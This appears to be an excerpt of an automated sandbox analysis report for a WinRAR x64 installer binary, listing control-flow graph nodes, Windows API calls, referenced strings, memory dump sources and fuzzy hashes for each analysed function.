                                                            control_flow_graph 1756 7ff6c3bbf9bc-7ff6c3bbf9fa 1757 7ff6c3bbfa00-7ff6c3bbfa03 1756->1757 1758 7ff6c3bbfaeb 1756->1758 1759 7ff6c3bbfa09 1757->1759 1760 7ff6c3bbfaed-7ff6c3bbfb09 1757->1760 1758->1760 1761 7ff6c3bbfa0c 1759->1761 1762 7ff6c3bbfae3 1761->1762 1763 7ff6c3bbfa12-7ff6c3bbfa21 1761->1763 1762->1758 1764 7ff6c3bbfa2e-7ff6c3bbfa4d LoadLibraryW 1763->1764 1765 7ff6c3bbfa23-7ff6c3bbfa26 1763->1765 1768 7ff6c3bbfa4f-7ff6c3bbfa58 GetLastError 1764->1768 1769 7ff6c3bbfaa5-7ff6c3bbfaba 1764->1769 1766 7ff6c3bbfac5-7ff6c3bbfad4 GetProcAddress 1765->1766 1767 7ff6c3bbfa2c 1765->1767 1766->1762 1774 7ff6c3bbfad6-7ff6c3bbfae1 1766->1774 1770 7ff6c3bbfa99-7ff6c3bbfaa0 1767->1770 1771 7ff6c3bbfa87-7ff6c3bbfa91 1768->1771 1772 7ff6c3bbfa5a-7ff6c3bbfa6f call 7ff6c3bc4b6c 1768->1772 1769->1766 1773 7ff6c3bbfabc-7ff6c3bbfabf FreeLibrary 1769->1773 1770->1761 1771->1770 1772->1771 1777 7ff6c3bbfa71-7ff6c3bbfa85 LoadLibraryExW 1772->1777 1773->1766 1774->1760 1777->1769 1777->1771
                                                            APIs
                                                            • LoadLibraryW.KERNEL32(?,?,?,00007FF6C3BBFC6E,?,?,?,00007FF6C3BBF960,?,?,00000001,00007FF6C3BBC679), ref: 00007FF6C3BBFA41
                                                            • GetLastError.KERNEL32(?,?,?,00007FF6C3BBFC6E,?,?,?,00007FF6C3BBF960,?,?,00000001,00007FF6C3BBC679), ref: 00007FF6C3BBFA4F
                                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FF6C3BBFC6E,?,?,?,00007FF6C3BBF960,?,?,00000001,00007FF6C3BBC679), ref: 00007FF6C3BBFA79
                                                            • FreeLibrary.KERNEL32(?,?,?,00007FF6C3BBFC6E,?,?,?,00007FF6C3BBF960,?,?,00000001,00007FF6C3BBC679), ref: 00007FF6C3BBFABF
                                                            • GetProcAddress.KERNEL32(?,?,?,00007FF6C3BBFC6E,?,?,?,00007FF6C3BBF960,?,?,00000001,00007FF6C3BBC679), ref: 00007FF6C3BBFACB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                                            • String ID: api-ms-
                                                            • API String ID: 2559590344-2084034818
                                                            • Opcode ID: bae88bc27c21ad60c76f677b5c45fa165faed71e7c4ca7cdbe25b1edddfacdfe
                                                            • Instruction ID: 749d8a7ddf4264d066b2329061b243d2c335a53bf29fc789a033ff5f3c987aea
                                                            • Opcode Fuzzy Hash: bae88bc27c21ad60c76f677b5c45fa165faed71e7c4ca7cdbe25b1edddfacdfe
                                                            • Instruction Fuzzy Hash: 0631D421B1AB42C1EE159F02A84297563E4FF6AFAAF594535DDDDAA394DF3CE040C700

                                                            Control-flow Graph

                                                            APIs
                                                            • GlobalAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6C3BB1317), ref: 00007FF6C3BB0EFC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: AllocGlobal
                                                            • String ID: $</html>$<html>$<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                            • API String ID: 3761449716-2515208629
                                                            • Opcode ID: 125e7bda62205f68ffd57646446bb67724558c50e9972ca4f8095c52de3b50cb
                                                            • Instruction ID: fbf8c5f6a3c54837f1097230383adf674554cd7631d7d6fd404e243ef3c6f6a5
                                                            • Opcode Fuzzy Hash: 125e7bda62205f68ffd57646446bb67724558c50e9972ca4f8095c52de3b50cb
                                                            • Instruction Fuzzy Hash: 79414312F08A0695EB14DF61D892BFD2370AF65789F444431DDCDAA6AADF38D509C340

                                                            Control-flow Graph

                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,00004C5B49A943A4,00007FF6C3BC7721,?,?,?,?,00007FF6C3BC8FBA,?,?,00000000,00007FF6C3BCB137,?,?,?), ref: 00007FF6C3BC7467
                                                            • FlsSetValue.KERNEL32(?,?,00004C5B49A943A4,00007FF6C3BC7721,?,?,?,?,00007FF6C3BC8FBA,?,?,00000000,00007FF6C3BCB137,?,?,?), ref: 00007FF6C3BC749D
                                                            • FlsSetValue.KERNEL32(?,?,00004C5B49A943A4,00007FF6C3BC7721,?,?,?,?,00007FF6C3BC8FBA,?,?,00000000,00007FF6C3BCB137,?,?,?), ref: 00007FF6C3BC74CA
                                                            • FlsSetValue.KERNEL32(?,?,00004C5B49A943A4,00007FF6C3BC7721,?,?,?,?,00007FF6C3BC8FBA,?,?,00000000,00007FF6C3BCB137,?,?,?), ref: 00007FF6C3BC74DB
                                                            • FlsSetValue.KERNEL32(?,?,00004C5B49A943A4,00007FF6C3BC7721,?,?,?,?,00007FF6C3BC8FBA,?,?,00000000,00007FF6C3BCB137,?,?,?), ref: 00007FF6C3BC74EC
                                                            • SetLastError.KERNEL32(?,?,00004C5B49A943A4,00007FF6C3BC7721,?,?,?,?,00007FF6C3BC8FBA,?,?,00000000,00007FF6C3BCB137,?,?,?), ref: 00007FF6C3BC7507
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: Value$ErrorLast
                                                            • String ID:
                                                            • API String ID: 2506987500-0
                                                            • Opcode ID: ba828b49eb28cf8f14636659f097d3729cc1d46c627f16ccd11c1666027e59fe
                                                            • Instruction ID: 7e27d1ffbe7f1ef6ce2b4def9250d9dfe08b86d039df63da09c4df1acd8e9ef3
                                                            • Opcode Fuzzy Hash: ba828b49eb28cf8f14636659f097d3729cc1d46c627f16ccd11c1666027e59fe
                                                            • Instruction Fuzzy Hash: 10118C20B0824246FA34BF36B683C7D61865FA67B2F040775E9EEE66C6DF2CE4018300

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: File$CreateErrorLast$Time
                                                            • String ID:
                                                            • API String ID: 1999340476-0
                                                            • Opcode ID: dcfe0a08d1e0b445740c6a5767d5a0c50ae79fd6602f16daa682fc2f45f2860c
                                                            • Instruction ID: 94bba48cba4f6148c378fdeac4be251f65b7981e8634e34fd628b17662baf0f4
                                                            • Opcode Fuzzy Hash: dcfe0a08d1e0b445740c6a5767d5a0c50ae79fd6602f16daa682fc2f45f2860c
                                                            • Instruction Fuzzy Hash: 18510762A0864146FB209F25E056BB96760FBA6779F040335DEEEA7AD1CF3DD454CB00

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: Message$DialogDispatchPeekTranslate
                                                            • String ID:
                                                            • API String ID: 1266772231-0
                                                            • Opcode ID: 2d41d9326857e66844fb115c9f216b9fd577e98702e5580aa58207ff4f5c7ede
                                                            • Instruction ID: 3a49d03c8a41cca37be6368c45b8fc108446f94b5ec0076c7e2249ba8863a958
                                                            • Opcode Fuzzy Hash: 2d41d9326857e66844fb115c9f216b9fd577e98702e5580aa58207ff4f5c7ede
                                                            • Instruction Fuzzy Hash: 9EF0E129B2894282EB649F28E896E762350FFA6B0AF806131D5CE95854DF2CD118CB00

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: EnvironmentVariable
                                                            • String ID: sfxcmd$sfxpar
                                                            • API String ID: 1431749950-3493335439
                                                            • Opcode ID: f874a795e08bc184904b055741577f64434ce22e78270947d9c465dc1e555f4f
                                                            • Instruction ID: 638b921ff17bc20aea1896f09f87f0ceb85945793e01cd334106abc85b2140aa
                                                            • Opcode Fuzzy Hash: f874a795e08bc184904b055741577f64434ce22e78270947d9c465dc1e555f4f
                                                            • Instruction Fuzzy Hash: F8111261E1CA0A41EA14AF11E853AB97360FFB7796F441131E5CEAA2A6DE2CD149C740

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                            • String ID: EDIT
                                                            • API String ID: 4243998846-3080729518
                                                            • Opcode ID: a3730f09f30549a015c781de93191d6efbc31bd36ef359d9da3c26f4bf0f9089
                                                            • Instruction ID: 6af27cbd1d804597014a9e5336ae9a53793add5c11e04aa99ef5eb329087dcc5
                                                            • Opcode Fuzzy Hash: a3730f09f30549a015c781de93191d6efbc31bd36ef359d9da3c26f4bf0f9089
                                                            • Instruction Fuzzy Hash: CF018625B08B4281FA64AF15F852B756390BF6B786F442431CDCDAA654DE3CE104CB50
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                            • String ID: riched20.dll
                                                            • API String ID: 3498096277-3360196438
                                                            • Opcode ID: c0c4354b3a722462936f22d72a1057884a4e333d87d77a2b0ef64c4271690ca3
                                                            • Instruction ID: 625d5ce6f7b5cebe1f3f17a4fbafff9f9543d3791efebcc71698f27def9f3bb5
                                                            • Opcode Fuzzy Hash: c0c4354b3a722462936f22d72a1057884a4e333d87d77a2b0ef64c4271690ca3
                                                            • Instruction Fuzzy Hash: 69F09635A08A4782EB409F24F4565697360FFAA706F400031D5CE96AA4DF7CD64DCF00
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: QueryValue$CloseOpen
                                                            • String ID:
                                                            • API String ID: 1586453840-0
                                                            • Opcode ID: 28a070677619c59ed845ba7aa30c74b9fadcb3fd9c6e5316b8293aa6b47e6f28
                                                            • Instruction ID: 5eb9bdc6d5cff7b28cef530db656e39c72cd3a92d94600d3b165f5e367214042
                                                            • Opcode Fuzzy Hash: 28a070677619c59ed845ba7aa30c74b9fadcb3fd9c6e5316b8293aa6b47e6f28
                                                            • Instruction Fuzzy Hash: BF419C26B14A0189EB10DF61D842AED37B4FF6AB84B805032EEDDA7B59DF38D545C780
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                            • String ID:
                                                            • API String ID: 1452418845-0
                                                            • Opcode ID: b1a589d711ce5c113e8e4a51647d4a5db0ae59c4c3c3c73f71d1b0031afe7af5
                                                            • Instruction ID: ab1bbe10392df1c1125beeab4a48bae66ffb92f73a1989e592b06ced2d7fdf08
                                                            • Opcode Fuzzy Hash: b1a589d711ce5c113e8e4a51647d4a5db0ae59c4c3c3c73f71d1b0031afe7af5
                                                            • Instruction Fuzzy Hash: 03314B20E0C20746FA64AF25A493FB92391AF7378AF444434D9CEEF2D7DE2DB8048651
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$FileHandleRead
                                                            • String ID:
                                                            • API String ID: 2244327787-0
                                                            • Opcode ID: 8101a7d1bdd2c023f2f94ac8423880c59af0b93fe812d6a548fd58d45e480cb0
                                                            • Instruction ID: 20e642447c774eabfa6365135316a01603a39bb5c39a7316dfea8011174dc6c8
                                                            • Opcode Fuzzy Hash: 8101a7d1bdd2c023f2f94ac8423880c59af0b93fe812d6a548fd58d45e480cb0
                                                            • Instruction Fuzzy Hash: 2B219532A18E4181EA605F21B801BB9A350BB66B96F144131DEDDE6689CF3CF4848740
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: BrowseFolderFromListMallocPath
                                                            • String ID: A
                                                            • API String ID: 2332185071-3554254475
                                                            • Opcode ID: b00eb2558a74acd322b513043997ce8e923ceda0cdca6b51de8298474a559cb6
                                                            • Instruction ID: 2dce2dd653e334d0b3860c61311770f41a6c634073de60d03ea92be310c0e3bf
                                                            • Opcode Fuzzy Hash: b00eb2558a74acd322b513043997ce8e923ceda0cdca6b51de8298474a559cb6
                                                            • Instruction Fuzzy Hash: DF119466A18B8586EB509F11F48676AB3B4FBAABD5F400130DACD87B54DF3CD048CB40
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: FindHandleModuleResource
                                                            • String ID: RTL
                                                            • API String ID: 3537982541-834975271
                                                            • Opcode ID: 3fe9193610b2b954ca747a9453040e17f244332993db366b631c7d02911bbf0e
                                                            • Instruction ID: fa8010019c228927b66bb693c9e0df26eb22e84dd59210a6032b030e4f785d8c
                                                            • Opcode Fuzzy Hash: 3fe9193610b2b954ca747a9453040e17f244332993db366b631c7d02911bbf0e
                                                            • Instruction Fuzzy Hash: FFE01214F09B4282EA08AB1668676743B905FABB83F544478C9CE92768DD7CA2488B40
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: Info
                                                            • String ID:
                                                            • API String ID: 1807457897-3916222277
                                                            • Opcode ID: 789a4126fd2d51ccc01158b3c7840c3a71ce060e94776f7cb552cb3a58c115b4
                                                            • Instruction ID: aea0b08f11d83dbea7f3ed70718c2ebf38c57d909be16f88c04a6999016d5dd2
                                                            • Opcode Fuzzy Hash: 789a4126fd2d51ccc01158b3c7840c3a71ce060e94776f7cb552cb3a58c115b4
                                                            • Instruction Fuzzy Hash: 6551CF32A1C6C18AE7219F24E085BAE7BA0F75A389F54413AD7CD97A86CF7CD145CB00
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: String
                                                            • String ID: LCMapStringEx
                                                            • API String ID: 2568140703-3893581201
                                                            • Opcode ID: 613a1c34520167f2aa5f946c31bc094c4d5f9712b6e2a61671e31258b46fd4f4
                                                            • Instruction ID: 58fa23d9c574df948f17ed23268c29d1604826af8b82a796c1c42a805bfc7353
                                                            • Opcode Fuzzy Hash: 613a1c34520167f2aa5f946c31bc094c4d5f9712b6e2a61671e31258b46fd4f4
                                                            • Instruction Fuzzy Hash: C0212C35708B8186DB64CF16F441AAAB7A4FB9ABC0F444136EACD93B19DF3CD5408B00
                                                            APIs
                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00000003,00007FF6C3BC8AB1), ref: 00007FF6C3BCB442
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: CountCriticalInitializeSectionSpin
                                                            • String ID: InitializeCriticalSectionEx
                                                            • API String ID: 2593887523-3084827643
                                                            • Opcode ID: 19fc9a1f5a494f31fae254fb8f71d4e9c6c503fc6ba75a204470776c44fbeb90
                                                            • Instruction ID: cb07a1a2f977c488c4f5cda44fdcad6b3578a58b0e8d6b0c8a23f01a517a1dbd
                                                            • Opcode Fuzzy Hash: 19fc9a1f5a494f31fae254fb8f71d4e9c6c503fc6ba75a204470776c44fbeb90
                                                            • Instruction Fuzzy Hash: 18F09025B1C75182E6149F06B1428B96361BFAAB82F984432EEDEA3B5CCE3CD8458740
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
